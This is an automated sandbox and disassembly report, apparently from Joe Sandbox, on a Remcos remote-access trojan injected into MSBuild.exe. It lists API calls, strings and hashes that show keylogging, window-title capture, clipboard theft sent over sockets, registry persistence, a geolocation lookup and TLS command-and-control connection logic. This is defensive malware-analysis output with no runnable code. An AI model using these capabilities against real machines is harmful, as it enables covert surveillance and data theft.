                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
• String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
• API String ID: 2830904901-1887556364
• Opcode ID: 87003e204c4ecd466d61ad1f5c7ddce927d9ea30a70c95020367db40776ccb3a
• Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
• Opcode Fuzzy Hash: 87003e204c4ecd466d61ad1f5c7ddce927d9ea30a70c95020367db40776ccb3a
• Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

Control-flow Graph

APIs
• Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
• WSAGetLastError.WS2_32 ref: 00414249
• Sleep.KERNEL32(00000000,00000002), ref: 00414B88
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Sleep$ErrorLastLocalTime
• String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
• API String ID: 524882891-329437720
• Opcode ID: 5b765eaed3a498000d149d4314c37cb7c3f7fd8bdc94e19b00e9a18a556f0a33
• Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
• Opcode Fuzzy Hash: 5b765eaed3a498000d149d4314c37cb7c3f7fd8bdc94e19b00e9a18a556f0a33
• Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

Control-flow Graph

APIs
• Sleep.KERNEL32(00001388), ref: 00409E62
  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
• GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
• String ID: @CG$@CG$XCG$XCG$xAG$xAG
• API String ID: 3795512280-3163867910
• Opcode ID: da4891e1813a42c55b3ab5888db0cc17f90dbe763a6cce2da1c90d345f1a7bd1
• Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
• Opcode Fuzzy Hash: da4891e1813a42c55b3ab5888db0cc17f90dbe763a6cce2da1c90d345f1a7bd1
• Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

Control-flow Graph

APIs
• connect.WS2_32(?,?,?), ref: 004042A5
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
• WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
• Opcode ID: 9e0300746ced542d644864050c56bad8214476e96f5afa229243408216744f80
• Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
• Opcode Fuzzy Hash: 9e0300746ced542d644864050c56bad8214476e96f5afa229243408216744f80
• Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

Control-flow Graph

APIs
• __Init_thread_footer.LIBCMT ref: 0040A456
• Sleep.KERNEL32(000001F4), ref: 0040A461
• GetForegroundWindow.USER32 ref: 0040A467
• GetWindowTextLengthW.USER32(00000000), ref: 0040A470
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
• Sleep.KERNEL32(000003E8), ref: 0040A574
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425
• Opcode ID: f8b3156baaa7727dad8a2e60dc5fbc73354b311146034ba8b2c8c954e646e4f0
• Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
• Opcode Fuzzy Hash: f8b3156baaa7727dad8a2e60dc5fbc73354b311146034ba8b2c8c954e646e4f0
• Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath
                                                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                        • API String ID: 82841172-425784914
                                                                                                                        • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                        • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                                        • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                        • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32 ref: 00415A46
                                                                                                                        • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                        • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                        • OpenClipboard.USER32 ref: 00415A61
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                        • CloseClipboard.USER32 ref: 00415A89
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2172192267-0
                                                                                                                        • Opcode ID: 20bbd8a9be223023429b86dd59441cf199e90aae28cc1759b9981102a65ca55e
                                                                                                                        • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                                        • Opcode Fuzzy Hash: 20bbd8a9be223023429b86dd59441cf199e90aae28cc1759b9981102a65ca55e
                                                                                                                        • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
• InternetCloseHandle.WININET(00000000), ref: 0041A5B3
• InternetCloseHandle.WININET(00000000), ref: 0041A5B6
Strings
• http://geoplugin.net/json.gp, xrefs: 0041A54E
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
• Opcode ID: 6b4a09cc400eb253b86198db5e131c1a7ef1d480120042e2a6393a51d8aeec4d
• Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
• Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6

Control-flow Graph

APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseCurrentOpenProcessQueryValue
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 1866151309-2070987746
• Opcode ID: 81e27e0eafa7ada8965556ff931baaf3a7dc027ccdadbdb1890a37f2881e35bf
• Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
• Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

Control-flow Graph (4126d2-4126e9 RegCreateKeyA, branching to 412722 or to 4126eb-412720 RegSetValueExA/RegCloseKey, both converging at 412724-412730)

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
• RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
• RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: HgF$pth_unenc
• API String ID: 1818849710-3662775637
• Opcode ID: ddbfc9346cb1df8603390f45d52edca88235b9551560ffb2f18b7b49edab08f4
• Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
• Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

APIs
• CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 500aa7415aebb72bd48f6e411c5bff9981bb0a1ffcdd18614d34843fe97faccd
• Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
• Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
• RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: TUF
• API String ID: 1818849710-3431404234
• Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
• Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
• Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
• Opcode ID: b5a46ec9b5a55459a009272bbca25cecd91462549485a21a627875659f9e3563
• Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
• Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A

APIs
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
• WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
• CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
• Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
• Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
• Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE

Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CountEventTick
• String ID: >G
• API String ID: 180926312-1296849874
• Opcode ID: d6d82ca6659afa233ab8bf4b33e209ac008b58294be32f34f68e9c45f57fe3cd
• Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
• Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A

APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CreateErrorLastMutex
• String ID: (CG
• API String ID: 1925916568-4210230975
• Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
• Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
• Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNEL32(?), ref: 0041255F
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
• Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
• Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
• RegCloseKey.KERNEL32(00000000), ref: 0041269D
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
• Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
• Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3677997916-0
                                                                                                                        • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                        • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                        • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                        • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001C96F,00000000,00000000,00000000), ref: 00415D4A
                                                                                                                        • ShowWindow.USER32(00000009), ref: 00415D64
                                                                                                                        • SetForegroundWindow.USER32 ref: 00415D70
                                                                                                                          • Part of subcall function 0041BEB0: AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                          • Part of subcall function 0041BEB0: ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                          • Part of subcall function 0041BEB0: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3446828153-0
                                                                                                                        • Opcode ID: 2746618531f85624d519dcfad62fa3fd490632c023c0ce94cdd3baf9e7c67748
                                                                                                                        • Instruction ID: d4a312bc08deb00524ad4f96a22c8b91b804439ffc6ddefb5fa2deb2480904ec
                                                                                                                        • Opcode Fuzzy Hash: 2746618531f85624d519dcfad62fa3fd490632c023c0ce94cdd3baf9e7c67748
                                                                                                                        • Instruction Fuzzy Hash: 31F0B431104201EAD310AB61FC06AFA3768EB50301F10887FFC49C20B2DB3498859A5D
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                        • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3677997916-0
                                                                                                                        • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                        • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                        • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                        • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: xAG
                                                                                                                        • API String ID: 176396367-2759412365
                                                                                                                        • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                                        • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                                        • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                                        • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0041526E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecuteShell
                                                                                                                        • String ID: open
                                                                                                                        • API String ID: 587946157-2758837156
                                                                                                                        • Opcode ID: c8674de7ec00f2757910a9bb23fdc902d0f1d7b475bfa7c08172f7d7b9988c4f
                                                                                                                        • Instruction ID: a717779756fc853709bdab9af9b60c22d435cd15da1241abc9879386ec2ea144
                                                                                                                        • Opcode Fuzzy Hash: c8674de7ec00f2757910a9bb23fdc902d0f1d7b475bfa7c08172f7d7b9988c4f
                                                                                                                        • Instruction Fuzzy Hash: 34E012712043459AD214FAB1ECD5EFF73A9EB90314F00483FB90A520E2EE789949D669
                                                                                                                        APIs
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 1890195054-2766056989
                                                                                                                        • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                        • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                        • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                        • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00415745
